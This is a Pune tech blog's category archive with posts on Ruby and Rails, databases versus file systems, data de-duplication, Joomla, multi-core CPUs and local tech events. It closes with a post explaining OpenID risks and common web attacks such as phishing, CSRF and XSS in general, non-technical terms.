Category Archives: Technology

Why you need to learn Ruby and Rails

Official Ruby logo
Image via Wikipedia

With increasing visibility for the Ruby programming language, and the passion that people show for Ruby-on-Rails for web development, we felt that we would like to delve a little into what makes Ruby so cool and Rails so hot. Especially, in light of the fact that Ruby Fun Day is happening in Pune on Saturday, we wanted to give our readers a feel for why the should consider attending Ruby Fun Day. With that in mind, we invited Nick Adams of Entrip and SapnaSolutions (both those companies use Ruby-on-Rails as a cornerstone of their offerings), to tell us why Ruby and why Rails.

Ruby is an interpreted language like Python, Php, Perl, and a whole host of other popular Unix based languages. It was invented in 1992 by a Japanese man. However it only shot to fame in the last few years when the web development world started getting very excited about a new framework called ‘Ruby on Rails’, which arrived in 2005. But I’m getting ahead of myself. First, I’ll look at Ruby in its own right. Then, we’ll take a look at Rails and what’s cool about it.
The first thing you’ll notice about Ruby is it’s beautifully easy syntax:
5.times { print "Hello Pune!" } 
Goodbye to semi colons, variable declaration, etc it makes for readable code while ensuring you don’t spend more time than you need with coding. Ruby is 100% object oriented, in fact, everything in ruby including variables, are objects. That can be a little overwhelming at first, but it begins to make sense as you use a framework like rails and really reveals its true power when you want to change or add to the core ‘String’ class, on the fly. It means, in basic speak, that Ruby is very flexible. But there is more. Ruby has cool features like blocks, iterators, and a wealth of all the expected higher level language features like ‘capitalize’ and ‘reverse’ methods for strings.
Ruby on Rails
Image via Wikipedia

Rails is of course a web development framework. It is important not to see Rails as simply a collection of new classes and methods designed to aid web development. There are two things that I believe are important to understand before you dive into Rails. One is the MVC pattern of design. The MVC pattern of system design separates application logic into distinct parts making development fast, but also scalable and logical. The second is the rails conventions. Although sometimes ambiguous and debated, sticking to the basic rails conventions and understanding how the framework is designed to work will greatly aid collaboration, and futureproofing of your app.

What’s so cool about Rails? I recently interviewed someone who has worked in Java, Php and Rails for web development. I could sense the passion in him to work for a company that specialises in Rails, and didn’t need to explain why. If you have ever built a web application in .net, java, or php, you’ll really appreciate the power of Rails. It’s fast, modular, and working in Ruby is fun because you create clean, readable code. It’s free. Ajax and Web 2.0 style features are easy. Fully unit testing your app is easy. Roll out new ideas in weeks instead of months. Setup is easy, in any environment, but being open source it favours ‘nix based environments like Linux and Mac.
It all sounds great, doesn’t it? I would advise, however, that Rails is best understood by those who have understanding of the web and building database driven web applications already. Rails is a framework built on long standing notions, it’s not a magical new web development language. It makes what exists already, much easier and faster. Understand the Web. Understand Web Applications. Understand MVC. Then learn Rails, and you’ll never look back!

About the Author – Nick Adams

Nick Adams is the co-founder of Entrip, an integrated travel utility that gives a map-based interface to plan your trip, capture your experiences in multimedia, and share them with friends. SapnaSolutions is the Ruby on Rails Development company behind EnTrip. They make Web Apps for clients and develop in house products. He can be reached at nick [at] entrip [dot] com
Reblog this post [with Zemanta]

Should you use a file-system or a database

Whether to use a file-system or a database to store the data of your application has been a contentious issue since the 80s. It was something we worried about even when I was doing my Ph.D. in Databases in the 90s. Now Jaspreet Singh, of Pune-based startup Druvaa has weighed in on this issue on Druvaa’s blog. His post is republished here with permission.

This topic has been on my plate for some time now. It’s interesting to see how databases have come a long way and have clearly out-shadowed file-systems for storing structured or unstructured information.

Technically, both of them support the basic features necessary for data access. For example both of them ensure  –

  • Data is managed to ensure its integrity and quality
  • Allow shared access by a community of users
  • Use of well defined schema for data-access
  • Support a query language

But, file-systems seriously lack some of the critical features necessary for managing data. Lets take a look at some of these feature.

Transaction support
Atomic transactions guarantee complete failure or success of an operation. This is especially needed when there is concurrent access to same data-set. This is one of the basic features provided by all databases.

But, most file-systems don’t have this features. Only the lesser known file-systems – Transactional NTFS(TxF), Sun ZFS, Veritas VxFS support this feature. Most of the popular opensource file-systems (including ext3, xfs, reiserfs) are not even POSIX compliant.

Fast Indexing
Databases allow indexing based on any attribute or data-property (i.e. SQL columns). This helps fast retrieval of data, based on the indexed attribute. This functionality is not offered by most file-systems i.e. you can’t quickly access “all files created after 2PM today”.

The desktop search tools like Google desktop or MAC spotlight offer this functionality. But for this, they have to scan and index the complete file-system and store the information in a internal relational-database.

Snapshots
Snapshot is a point-in-time copy/view of the data. Snapshots are needed for backup applications, which need consistent point-in-time copies of data.

The transactional and journaling capabilities enable most of the databases to offer snapshots without shopping access to the data. Most file-systems however, don’t provide this feature (ZFS and VxFS being only exceptions). The backup softwares have to either depend on running application or underlying storage for snapshots.

Clustering
Advanced databases like Oracle (and now MySQL) also offer clustering capabilities. The “g” in “Oracle 11g” actually stands for “grid” or clustering capability. MySQL offers shared-nothing clusters using synchronous replication. This helps the databases scale up and support larger & more-fault tolerant production environments.

File systems still don’t support this option 🙁  The only exceptions are Veritas CFS and GFS (Open Source).

Replication
Replication is commodity with databases and form the basis for disaster-recovery plans. File-systems still have to evolve to handle it.

Relational View of Data
File systems store files and other objects only as a stream of bytes, and have little or no information about the data stored in the files. Such file systems also provide only a single way of organizing the files, namely via directories and file names. The associated attributes are also limited in number e.g. – type, size, author, creation time etc. This does not help in managing related data, as disparate items do not have any relationships defined.

Databases on the other hand offer easy means to relate stored data. It also offers a flexible query language (SQL) to retrieve the data. For example, it is possible to query a database for “contacts of all persons who live in Acapulco and sent emails yesterday”, but impossible in case of a file system.

File-systems need to evolve and provide capabilities to relate different data-sets. This will help the application writers to make use of native file-system capabilities to relate data. A good effort in this direction was Microsoft WinFS.

Conclusion

The only disadvantage with using the databases as primary storage option, seems to be the additional cost associated. But, I see no reason why file-systems in future will borrow features from databases.

Disclosure

Druvaa inSync uses a proprietary file-system to store and index the backed up data. The meta-data for the file-system is stored in an embedded PostgreSQL database. The database driven model was chosen to store additional identifiers withe each block – size, hash and time. This helps the filesystem to –

  1. Divide files into variable sized blocks
  2. Data deduplication – Store single copy of duplicate blocks
  3. Temporal File-system – Store time information with each block. This enables faster time-based restores.
Reblog this post [with Zemanta]

Understanding Data De-duplication

Druvaa is a Pune-based startup that sells fast, efficient, and cheap backup (Update: see the comments section for Druvaa’s comments on my use of the word “cheap” here – apparently they sell even in cases where their product is priced above the competing offerings) software for enterprises and SMEs. It makes heavy use of data de-duplication technology to deliver on the promise of speed and low-bandwidth consumption. In this article, reproduced with permission from their blog, they explain what exactly data de-duplication is and how it works.

Definition of Data De-duplication

Data deduplication or Single Instancing essentially refers to the elimination of redundant data. In the deduplication process, duplicate data is deleted, leaving only one copy (single instance) of the data to be stored. However, indexing of all data is still retained should that data ever be required.

Example
A typical email system might contain 100 instances of the same 1 MB file attachment. If the email platform is backed up or archived, all 100 instances are saved, requiring 100 MB storage space. With data deduplication, only one instance of the attachment is actually stored; each subsequent instance is just referenced back to the one saved copy reducing storage and bandwidth demand to only 1 MB.

Technological Classification

The practical benefits of this technology depend upon various factors like –

  1. Point of Application – Source Vs Target
  2. Time of Application – Inline vs Post-Process
  3. Granularity – File vs Sub-File level
  4. Algorithm – Fixed size blocks Vs Variable length data segments

A simple relation between these factors can be explained using the diagram below –

Deduplication Technological Classification

Target Vs Source based Deduplication

Target based deduplication acts on the target data storage media. In this case the client is unmodified and not aware of any deduplication. The deduplication engine can embedded in the hardware array, which can be used as NAS/SAN device with deduplication capabilities. Alternatively it can also be offered as an independent software or hardware appliance which acts as intermediary between backup server and storage arrays. In both cases it improves only the storage utilization.

Target Vs Source Deduplication

On the contrary Source based deduplication acts on the data at the source before it’s moved. A deduplication aware backup agent is installed on the client which backs up only unique data. The result is improved bandwidth and storage utilization. But, this imposes additional computational load on the backup client.

Inline Vs Post-process Deduplication

In target based deduplication, the deduplication engine can either process data for duplicates in real time (i.e. as and when its send to target) or after its been stored in the target storage.

The former is called inline deduplication. The obvious advantages are –

  1. Increase in overall efficiency as data is only passed and processed once
  2. The processed data is instantaneously available for post storage processes like recovery and replication reducing the RPO and RTO window.

the disadvantages are –

  1. Decrease in write throughput
  2. Extent of deduplication is less – Only fixed-length block deduplication approach can be use

The inline deduplication only processed incoming raw blocks and does not have any knowledge of the files or file-structure. This forces it to use the fixed-length block approach (discussed in details later).

Inline Vs Post Process Deduplication

The post-process deduplication asynchronously acts on the stored data. And has an exact opposite effect on advantages and disadvantages of the inline deduplication listed above.

File vs Sub-file Level Deduplication

The duplicate removal algorithm can be applied on full file or sub-file levels. Full file level duplicates can be easily eliminated by calculating single checksum of the complete file data and comparing it against existing checksums of already backed up files. It’s simple and fast, but the extent of deduplication is very less, as it does not address the problem of duplicate content found inside different files or data-sets (e.g. emails).

The sub-file level deduplication technique breaks the file into smaller fixed or variable size blocks, and then uses standard hash based algorithm to find similar blocks.

Fixed-Length Blocks v/s Variable-Length Data Segments

Fixed-length block approach, as the name suggests, divides the files into fixed size length blocks and uses simple checksum (MD5/SHA etc.) based approach to find duplicates. Although it’s possible to look for repeated blocks, the approach provides very limited effectiveness. The reason is that the primary opportunity for data reduction is in finding duplicate blocks in two transmitted datasets that are made up mostly – but not completely – of the same data segments.

Data Sets and Block Allignment

For example, similar data blocks may be present at different offsets in two different datasets. In other words the block boundary of similar data may be different. This is very common when some bytes are inserted in a file, and when the changed file processes again and divides into fixed-length blocks, all blocks appear to have changed.

Therefore, two datasets with a small amount of difference are likely to have very few identical fixed length blocks.

Variable-Length Data Segment technology divides the data stream into variable length data segments using a methodology that can find the same block boundaries in different locations and contexts. This allows the boundaries to “float” within the data stream so that changes in one part of the dataset have little or no impact on the boundaries in other locations of the dataset.

ROI Benefits

Each organization has a capacity to generate data. The extent of savings depends upon – but not directly proportional to – the number of applications or end users generating data. Overall the deduplication savings depend upon following parameters –

  1. No. of applications or end users generating data
  2. Total data
  3. Daily change in data
  4. Type of data (emails/ documents/ media etc.)
  5. Backup policy (weekly-full – daily-incremental or daily-full)
  6. Retention period (90 days, 1 year etc.)
  7. Deduplication technology in place

The actual benefits of deduplication are realized once the same dataset is processed multiple times over a span of time for weekly/daily backups. This is especially true for variable length data segment technology which has a much better capability for dealing with arbitrary byte insertions.

Numbers
While some vendors claim 1:300 ratios of bandwidth/storage saving. Our customer statistics show that, the results are between 1:4 to 1:50 for source based deduplication.

Reblog this post [with Zemanta]

CSI Pune Lecture: Security Testing Using Models – 16 Jan 6:30pm

csipune_logo

What: CSI Pune Lecture on Security Testing Using Models with Prof. Padmanabhan Krishnan, Bond University, Australia.
When: Friday, 16th Jan, 6:30pm-8:30pm
Where: Dewang Mehta Auditorium, Persistent, S.B. Road
Registration and Fees: Free for CSI/ISACA members; Rs. 50 for students & Persistent employees; others Rs. 100. Register at http://csi-pune.org

Details:
In this, we present a framework based on model based testing for security vulnerabilities testing. Security vulnerabilities are not only related to security functionalities at the application level but are sensitive to implementation details. Thus traditional model based approaches which remove implementation details are by themselves inadequate for testing security vulnerabilities. We demonstrate a framework that retains the advantages of model based testing that exposes only the necessary details relevant for vulnerability testing.

Our framework has three sub-models: a model or specification of the key aspects of the application, a model about the relevant aspects of the implementation and a model of the attacker. These three models are them combined to generate test cases. The same approach can also be used to test if a system meets a privacy policy.

Who Should Attend: Professionals interested in Test Automation and students.

About the Speaker – Padmanabhan Krishnan

Prof. Krishnan is a Professor at the Centre for Software Assurance, School of IT, Bond University, Australia. He also holds a research associate position at the United Nations University, International Institute for Software Technology. He got his BTech from IIT-Kanpur and MS and PhD from the University of Michigan, Ann Arbor. His interests are in model based testing, verification techniques and practical formal methods for software assurance. He has held positions in the USA, Denmark, New Zealand, Germany and Australia.

Update: The slides of the talk are now available. Click here if you can not see the slides below.

Security Testing Using Models

View SlideShare presentation or Upload your own. (tags: security bond)

Related Articles

Seminar on Understanding Wi-Fi Cyber attacks

AirTight Logo

What: Free Seminar on Wi-Fi security and understanding wi-fi cyber attacks conducted by AirTight Networks and MCCI
When: Tuesday, Jan 13, 6pm-8:30pm
Where: Hall No. 6 & 7, B Wing, 5th Floor MCCIA Trade Tower, ICC Complex Senapati Bapat Road
Registration and Fees: This seminar is free for all. Register at: http://www.airtightnetworks.com/seminar/mccia.

Details:
WiFi is fast becoming popular in India – among home users, business travelers, and corporates. While WiFi provides the benefits of wireless and mobile access, unsecured WiFi provides an easy target for hit-and-run style attacks allowing hackers to cause severe damage while remaining invisible and undetected. The crimes range from cyber extortion, downloading illegal content, to theft of credit card numbers and other private corporate information. Most importantly, the recent incidents of cyber terrorism in India showed that an unsecured WiFi connection poses danger to national security.

WiFi cyber-attacks can be used to hack into your network to steal confidential data, steal usernames and passwords, steal user identities or to plan terror attacks. Your WiFi network can become a huge liability if not secured properly.

To create public awareness, MCCIA in association with AirTight Networks Pvt. Ltd., the global leader in wireless security, is conducting a free introductory seminar titled “Understanding WiFi Cyber-attacks”.

This seminar will be followed by a panel discussion titled “Legal and Financial Exposure from WiFi Cyber-attacks”. Panel members include top experts such as Deepak Shikarpur, Chairman, IT Committee, MCCIA, Vaishali Bhagwat, Top Cyber-crime Lawyer and Pravin Bhagwat, Wireless Networking Pioneer.

This seminar is free for all. Register at: http://www.airtightnetworks.com/seminar/mccia

Reblog this post [with Zemanta]

Why you should be on Twitter – and how best to use it

This weekend, at Barcamp Pune 5, I gave a presentation targeted towards people who are new to Twitter, or who do not see what the hype is all about. The presentation went into the reasons why people find Twitter so useful and why it’s considered to be the next best thing after email. I also gave tips and tricks on how to use twitter effectively.

You can view the presentation online via slideshare:

or you can download it in your favourite format: PDF, Powerpoint 2007, Powerpoint 97-2003. Please feel free to download it, forward it to your friends, especially the ones whom you want to convince to start using twitter.

An Introduction to Joomla! CMS

If you’ve been following the tech scene in Pune, you’d be aware of the tremendous success of PHPCamp Pune with over a 1000 registrants. One thing that quickly became clear during PHPCamp is the interest in having special interest groups for more specialized areas within PHP hacking – specifically Open Social, Drupal and Joomla!. To help you stay in touch, we asked Amit Kumar Singh, one of the primary movers behind PHPCamp, and behind the Joomla Users Group, India to give our readers an overview of Joomla! – what it is, and why is it so popular. This article is intentionally low-tech at our request – to give people just an quick overview of Joomla! If you want more details, especially technical deep dives, head over to Amit’s blog where he often has articles about Joomla!

Have you ever wondered how you can quickly build a website for yourself or your organization? If yes, then read on to find how you can do so.

What is Joomla!

Joomla! is a open source, content management system( CMS), written in PHP, licensed under GPL and managed by OSM Foundation .

Joomla is the English spelling of the Swahili word jumla meaning “all together” or “as a whole”.  You can read more about history of Joomla at wikipedia.

Well, in one word, secret to build websites quickly and easily is Joomla!. It takes the pain out of building and maintaining websites. It is designed and build to make managing websites easier for a layman.

Where to use

It can be used to build

  • Personal Websites
  • Company’s Website
  • Small Business Websites
  • NGO Websites
  • Online magazines and publications websites
  • School and colleges Websites

This is basically list of things that can be done with Joomla out of box.  Some of the core features of Joomla are

  • Article management
  • User registration and contacts
  • Themes
  • Search
  • Polling
  • Language support
  • Messaging
  • News Feeds and advertisement

If you need more, then you can easily extend Joomla to do lot more things and even use the framework to build some powerful applications. For example if you want to add additional fields to user registration form you can use community builder, if you want to put e-commerce shopping cart you can use vituemart, if you want to add forum you can use fireboard.

You can also see how others are using Joomla at Joomla sites showcase forum.

How to Extend

For me the best part of using Joomla is that it is very easy to customize and enhance. You can find extensions for your needs by simply looking in JED, just in case your need is really very unique then you can extend Joomla to suit your specific needs by writing simple components and modules.

If you get stuck while building something you can always find help from very active and helpful community members either at main Joomla Forum site or at Joomla User Group Pune.

About the Author – Amit Kumar Singh

Amit works as Technical Architect at Pune It Labs Pvt Ltd. He considers himself as a jack-of-all-trades related to technology, and trying to master PHP. Along with others he has started Joomla! Users Group Pune and is am part of un/organisers for PHPcamp, barcamp pune, opensocial developer garge, Joomladay. He has also created opensource plugins for Joomla, wordpress, jquery.

What is multi-core architecture and why you need to understand it

Dhananjay Nene has just written a brilliant article in which he gives a detailed overview of multi-core architectures for computer CPUs – why they came about, how they work, and why you should care. Yesterday, Anand Deshpande, CEO of Persistent Systems, while speaking at the IndicThreads conference on Java Technologies exhorted all programmers to understand multi-core architectures and program to take advantage of the possibilities they provide. Dhananjay’s article is thus very timely for both, junior programmers who wish to understand why Anand was attaching so much importance to this issue, and what they need to do about it, and also for managers in infotech to understand how they need to deal with that issue.

Dhananjay sets the stage with this lovely analogy where he compares the CPU of your computer with superman (Kal-El) and then multi-core is explained thus:

One fine morning Kal’s dad Jor-El knocked on your door and announced that Kal had a built in limitation that he was approaching, and that instead of doubling his productivity every year, he shall start cloning himself once each year (even though they would collectively draw the same salary). Having been used to too much of the good life you immediately exclaimed – “But thats preposterous – One person with twice the standard skill set is far superior to 2 persons with a standard skill set, and many years down the line One person with 64 times the standard skill sets is far far far superior to 64 persons with a standard skill set”. Even as you said this you realised your reason for disappointment and consternation – the collective Kal family was not going to be doing any lesser work than expected but the responsibility of ensuring effective coordination across 64, 128 and 256 Kals now lay upon you the manager, and that you realised was a burden extremely onerous to imagine and even more so to carry. However productive the Kal family was, the weakest link in the productivity was now going to be you the project manager. That in a nutshell is the multicore challenge, and that in a nutshell is the burden that some of your developers shall need to carry in the years to come.

What is to be done? First is to understand which programs are well suited to take advantage of a multi-core architecture, and which ones:

if Kal had been working on one single super complex project, the task of dividing up the activities across his multiple siblings would be very onerous, but if Kal was working on a large number of small projects, it would be very easy to simply distribute the projects across the various Kal’s and the coordination and management effort would be unlikely to increase much.

Dhananjay goes into more detail on this and many other issues, that I am skimming over. For example:

Some environments lend themselves to easier multi threading / processing and some make it tough. Some may not support multi threading at all. So this will constrain some of your choices and the decisions you make. While Java and C and C++ all support multi threading, it is much easier to build multi threaded programs in Java than in C or C++. While Python supports multi threading building processes with more than a handful of threads will run into the GIL issue which will limit any further efficiency improvements by adding more threads. Almost all languages will work with multi processing scenarios.

If you are a programmer or a manager of one, you should read the entire article.  In fact, as we mentioned in  a previous PuneTech post (Why Python is better than Java), you should really subscribe to his blog. He writes detailed and insightful articles that, as a techie, you would do well to read. If you are interested in programming languages, I would recommend reading “Contrasting java and dynamic languages”, and “Performance Comparison – C++ / Java / Python / Ruby/ Jython / JRuby / Groovy”. And if you are a blogger, check out his tips for software/programming blogging.

Dhananjay is a Pune-based software Engineer with 17 years in the field. Passionate about software engineering, programming, design and architecture. For more info, check out his PuneTech wiki profile.

Upcoming conferences and tech events in Pune – Nov/Dec 2008

IdeaCamp Pune (source: InsideSocialWeb.com)
Idea Camp Pune, 2008. Photo courtesy InsideSocialWeb.com

The next couple of months are going to rather active in Pune, with a host of really good conferences and events coming up. Some of these are free events, while others have a fee associated with them. We have written about some of them on PuneTech before, while some you’ll be hearing about for the first time. Some of them are for hardcore techies, while others are more tangential. In any case, there is something for everyone in here. Take this opportunity to improve your skills, or improve your business network.Except for power cuts, it is a great time to be a techie in Pune.

Nov 19 CSI Pune Lecture: Data Management for BI : Ashwin Deokar from SAS R&D Pune will talk about issues in data management in Business Intelligence. Free for members & students, Rs. 100 for others, Rs 50 for Persistent employees
Nov 22, 23 Code Camp: 24-hour code camp organized by Pune Linux Users Group. Free: anybody can attend.
Nov 22 Pune OpenCoffee Club Meeting – Pune Startup’s Pain Points : Get together with other startups in the Pune area and discuss solutions to common problems. Free, anybody can attend, no registration required.
Nov 25,26,27 IndicThreads Conference on Java Technologies: 3-day conference on Java; speakers from all over India. Fees range from Rs. 4000 to 8500 depending on various things.
Nov 27, 28 Conference on Advances in Usability Engineering: organized by Viswakarma Institute of Information Technology. Rs 3500 for professionals, Rs. 2000 for academics and Rs. 500 for students.
Nov 27, 28 Wi-Fi Security Training from AirTightNetworks: Airtight Networks has some of the best wi-fi security products in the world, and they have all been developed fully in Pune. Rs. 8000 before 21 Nov, Rs 10000 afterwards
Nov 27 World Usability Date, Pune 2008 (part of the Usability Conference: This event is a part of the Usability Engineering conference listed a couple of lines above; but this part of the conference (3pm to 6pm) is free and open to all.
Nov 29 Barcamp Pune 5: If you don’t know what a barcamp is read this to find out and figure out why you should attend.
Dec 4,5,6,7 Pune Design Festival 2008: Fees and registration details not yet available
Dec 06+ ClubHack – 2-day InfoTech Security Conference: One day of presentations on security, and one day of workshops. INR 1000 for talk sessions, INR 1000 for each workshop. On the spot registration INR 1500
Dec 12+ Society of Technical Communication – 2-day conference on technical writing: Fees and registration details not yet available
Dec 17 CSI Pune Lecture: Data Management for BI: next in the Business intelligence series by SAS R&S India. Fees most likely: Rs. 100 for others, Rs 50 for Persistent employees
Dec 20 OpenSocial Developer Garage: Conference for OpenSocial developers and enthusiasts. This is a free conference, but by invitation only – Register here to be considered for invitation.

And there are some great events in January too.

Did we miss any? Please add them to the common tech events calendar of Pune. Or, send us a mail with details of the event, and we’ll add it.

The Risks with OpenID

A few months ago, PuneTech carried an article by Hemant Kulkarni of Pune-based singleid.net giving an overview of OpenID, an up and coming technology that addresses a real pain point of anybody who has used the web – it removes the need to remember different passwords for different sites. This is called single-sign on or SSO in security parlance. More importantly, it achieves this with high security, without having to pass passwords all over the place. Actually, OpenID is much more than than this – read the whole article for more details.

Now, Rohit Srivastwa, founder of ClubHack (a group of volunteers dedicated to increasing awareness of security issues in Pune and elsewhere), has created a presentation on the risks associated with OpenID (for more information about Rohit, see his PuneTech wiki profile):

Risks With OpenID

View SlideShare presentation or Upload your own. (tags: clubhack openid)

Basically, he points out that a bunch of standard, well-known security attacks (we’ve listed some of them at the end of this article) that have been developed by hackers will also work against your OpenID provider (if you don’t know what provider means in this context, you really should skim that overview article), and that results in the criminals being able to access all your online accounts with the convenience and security of single-sign-on provided by OpenID. Not the effect you were trying for, eh?

So what is to be done? This doesn’t mean that OpenID is bad. In fact, it is great and will make online life much easier. All you need to do is be aware of the risks, and be more careful. Specifically, don’t use OpenID or single-sign-on for banks or credit card account access until we tell you otherwise. Always use https. When in doubt, be paranoid – just because you aren’t paranoid, doesn’t mean they aren’t all out to get you. And don’t take any biscuits from strangers (you’ll be surprised how many people do that on Pune-Nashik buses). And get free education on security issues from the activities of ClubHack.

Some background about security attacks

These days, one of the most important (and easiest to fall for) security risks is the possibility of getting phished. A phishing attack is one in which criminals create a website that looks just like some other website (e.g. your bank’s website) and then tricks you into divulging important information (like account number, password etc.) to them.

There are a bunch of other scary attacks possible – man-in-the-middle attack, replay attack, cross-site request forgery, and cross-site scripting attack.

A man-in-the-middle attack is when an evil website sits between you and your bank website. It pulls all information from the bank website and shows it to you – so it looks like the real thing. And it takes inputs (account number, PIN codes etc.) from you and passes them on to the bank site so that it is able to access your account and show you authentic information from your account. However, along the way, it has managed to get access to your account without your knowledge.

A cross-site request forgery is an attack where malicious code to access your bank account is embedded (and hidden) in the webpage at another website – maybe some chat forum that you visit. Here’s an example from the wikipedia:

For example, one user, Bob, might be browsing a chat forum where another user, Mallory, has posted a message. Suppose that Mallory has crafted an HTML image element that references a script on Bob’s bank’s website (rather than an image file), e.g.,

If Bob’s bank keeps his authentication information in a cookie, and if the cookie hasn’t expired, then the attempt by Bob’s browser to load the image will submit the withdrawal form with his cookie, thus authorizing a transaction without Bob’s approval.

A cross-site scripting (XSS) attack, is a vulnerability in which a hacker can inject malicious scripts (i.e. a little program that sits inside your webpage) into otherwise genuine webpages, and hence it is able to do something terrible either to your local computer, or your account.

Note: these exploits are not specific to OpenID. These are well-known attacks that are used all over the web in all kinds of situations. Wikipedia claims that 68% of all websites are vulnerable to XSS attacks. If you are now afraid of using your computer, shouldn’t even read this article that gives an idea of how the underground hacker economy works. But do contact ClubHack to get yourself educated on basic security hygiene. To paraphrase QuickHeal‘s marketing message, aap ke PC meiN kauN rehta hai? Hacker ya ClubHack? (Incidentally, QuickHeal happens to be a Pune-based company, which is giving multi-nationals like Symantec a run for their money (incidentally, Symantec happens to have its largest R&D center in Pune (incidentally, did you notice that Pune is a very happening place technologically? (incidentally, I think you should let everybody know about how happening a place Pune is (technologically speaking) by asking them to subscribe to PuneTech)))).